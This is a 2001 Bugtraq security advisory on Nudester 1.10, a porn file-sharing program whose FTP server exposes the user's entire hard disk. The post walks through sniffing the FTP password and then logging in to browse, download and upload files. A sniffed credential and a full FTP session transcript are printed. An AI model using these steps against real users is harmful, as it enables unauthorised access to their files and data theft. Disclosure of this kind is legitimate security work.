[22288] in bugtraq
[Real Security] Advisory for Nudester 1.10
daemon@ATHENA.MIT.EDU (Gary)
Fri Aug 17 10:56:51 2001
Message-ID: <004801c126ca$27eac0b0$4f99f4cc@cyph3r>
From: "Gary" <Cyph3r@phreaker.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 16 Aug 2001 20:10:22 -0700
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<------------------------->
[Real Security Advisory #1]
[ Author: Cyph3r ]
[ www.Real-Security.org ]
[ Date: 08/16/2001 ]
<------------------------->
[Vulnerable: ]
[Nudester 1.10(and below?)]
[ OS: Win9x/me/2k/nt/xp ]
[ Site: www.nudester.org ]
<------------------------->
-> Severity: Malicious users can gain full access to the users Files
(upload/download)
-> Overview: Nudester, a file sharing program for porn uses the FTP protocol
to transfer files,
The problem is it gives access to the whole hard disk instead of just the
folder containing porn.
Example:
Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a
file from a user on Nudester
While having the sniffer running filtering port 21 inclusive so you can get
the password.
<Sniffed Data>
220 ICS FTP Server ready
user NUDESTER
331 Password required for NUDESTER
pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in
</Sniffed data>
Open an ftp client and connect to the ip
ftp> open ***.***.***.***
Connected to ***.***.***.***
220 ICS FTP Server ready.
User (***.***.***.***:(none)): NUDESTER
331 Password required for NUDESTER.
Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
230 User NUDESTER logged in.
- Bingo!
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> DIR
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
-rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
-rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
-rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
-rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
-rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
-rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
-rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
-rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
-rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
-rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
-rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
-rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
-rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
-rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
-rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
-rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
-rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
-rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
-rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
-rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
-rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
-rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
-rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
-rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
-rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
-rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
-rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
-rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
-rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
-rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
226 File sent ok
ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
- Lets see if we have access to download a file
ftp> get netsig.txt
200 Port command successful.
150 Opening data connection for netsig.txt.
226 File sent ok
ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
- Yep, let's try to upload a file
ftp> put c:\temp.txt
200 Port command successful.
150 Opening data connection for TEMP.TXT.
226 File received ok
-> Conclusion: anyone can gain full access to Nudester user's files; the
username is the same for every user
However the password is not the same, you will have to sniff while
downloading a file to retrieve the password,
The only solution to this problem is not to use Nudester.
-> Credits: Cyph3r - Cyph3r@phreaker.net
-> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
spasms, trew, zeronine, matt, shizniz, z0mb1e
b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
